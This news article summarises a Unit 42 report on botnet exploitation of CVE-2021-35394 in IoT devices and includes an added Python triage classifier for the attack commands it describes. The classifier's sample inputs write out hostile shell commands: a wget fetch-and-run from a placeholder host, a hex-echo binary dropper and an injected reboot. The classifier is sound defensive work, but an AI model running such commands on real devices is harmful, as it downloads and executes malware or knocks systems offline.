Friday, June 19, 2026

There have been over 134 million attempts to hack IoT devices.


According to Palo Alto Networks Unit 42, the ongoing campaign recorded 134 million exploit attempts through December 2022, with 97 percent of the attacks occurring in the past four months. Almost half of the attacks come from the US (48.3%), followed by Vietnam (17.8%), Russia (14.6%), the Netherlands (7.4%), France (6.4%), Germany (2.3%) and Luxembourg (1.6%). Moreover, 95% of the attacks that originated in Russia and exploited the flaw were aimed at Australian organizations.

“Many of the attacks we observed attempted to deliver malware to infect vulnerable IoT devices,” Unit 42 researchers said in a report, adding that “threat groups are using this vulnerability to launch large-scale attacks against smart devices around the world.”

The vulnerability in question, CVE-2021-35394, is a set of buffer overflow and arbitrary command injection flaws that can be weaponized to run arbitrary code with the highest privilege level and hijack vulnerable devices.

The issues were disclosed by ONEKEY (formerly IoT Inspector) in August 2021. The vulnerabilities affect a wide range of devices from D-Link, LG, Belkin, ASUS and NETGEAR.


Unit 42 stated that it found three different types of “payloads” distributed as a result of exploiting the vulnerability:
• A script that executes a shell command on the target server to download additional malware.
• An injected command that writes a binary payload to a file and executes it.
• An injected command that directly reboots the target server, causing a denial-of-service (DoS) condition.
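For triage, the three payload types above can be told apart in captured command strings. The following is an added example, not code from Unit 42's report or from this page; the program lists, the matching heuristics and the sample strings are assumptions constructed for illustration.

```python
import re

# Assumed heuristics for the three payload families listed above.
FETCHERS = {"wget", "curl", "tftp", "ftpget"}
REBOOTERS = {"reboot", "halt", "poweroff"}
SEPARATORS = re.compile(r";|&&|\|\||\||\n|`|\$\(")
# \xNN escapes written into a redirect target (the target path is captured).
HEX_WRITE = re.compile(r"\\x[0-9a-fA-F]{2}.*>{1,2}\s*([^\s)]+)")


def program(part: str) -> str:
    """Return the basename of the program a command segment runs."""
    names = [t.rsplit("/", 1)[-1] for t in part.split()[:2]]
    # BusyBox applets are often invoked as "busybox wget ...".
    if names[0] == "busybox" and len(names) > 1:
        return names[1]
    return names[0]


def classify(command: str) -> str:
    """Label a captured command string with one of the three payload types."""
    parts = [p.strip().rstrip(")").strip() for p in SEPARATORS.split(command)]
    parts = [p for p in parts if p]
    for i, part in enumerate(parts):
        m = HEX_WRITE.search(part)
        if m and program(part) in {"echo", "printf"}:
            # Only a dropper if the written file is used afterwards.
            if any(m.group(1) in later for later in parts[i + 1:]):
                return "binary_dropper"
    progs = {program(p) for p in parts}
    if progs & FETCHERS:
        return "downloader"
    if progs & REBOOTERS:
        return "reboot_dos"
    return "unclassified"


# Constructed sample inputs (documentation address, placeholder file names).
SAMPLES = [
    "cd /tmp; busybox wget http://192.0.2.10/a.sh -O a.sh; sh a.sh",
    r"echo -ne '\x7f\x45\x4c\x46' > /tmp/b && chmod +x /tmp/b && /tmp/b",
    "`/sbin/reboot`",
    "cat /var/log/wget.log",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{classify(s):15} {s}")
```

Matching on the program name of each command segment, rather than on a substring, keeps a log path such as `/var/log/wget.log` from being labelled a downloader.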

Exploitation of CVE-2021-35394 is being used to deliver well-known botnets such as Mirai, Gafgyt, and Mozi, as well as a new Golang-based distributed denial of service (DDoS) botnet called RedGoBot.

The RedGoBot campaign (first discovered in 2022) deploys a shell script designed to download a range of botnet clients tailored to different CPU architectures. Once launched, the malware is ready to execute operating system commands and launch DDoS attacks. The findings once again highlight the importance of timely software updates to avoid exposure to potential threats.

“The wave of attacks using CVE-2021-35394 shows that attackers have a serious interest in supply chain vulnerabilities that can be difficult for the average user to identify and fix. These issues may make it difficult for affected users to identify the specific downstream products that are being attacked,” the researchers concluded.


Sandra Loyd
Sandra is the Reporter working for World Weekly News. She loves to learn about the latest news from all around the world and share it with our readers.
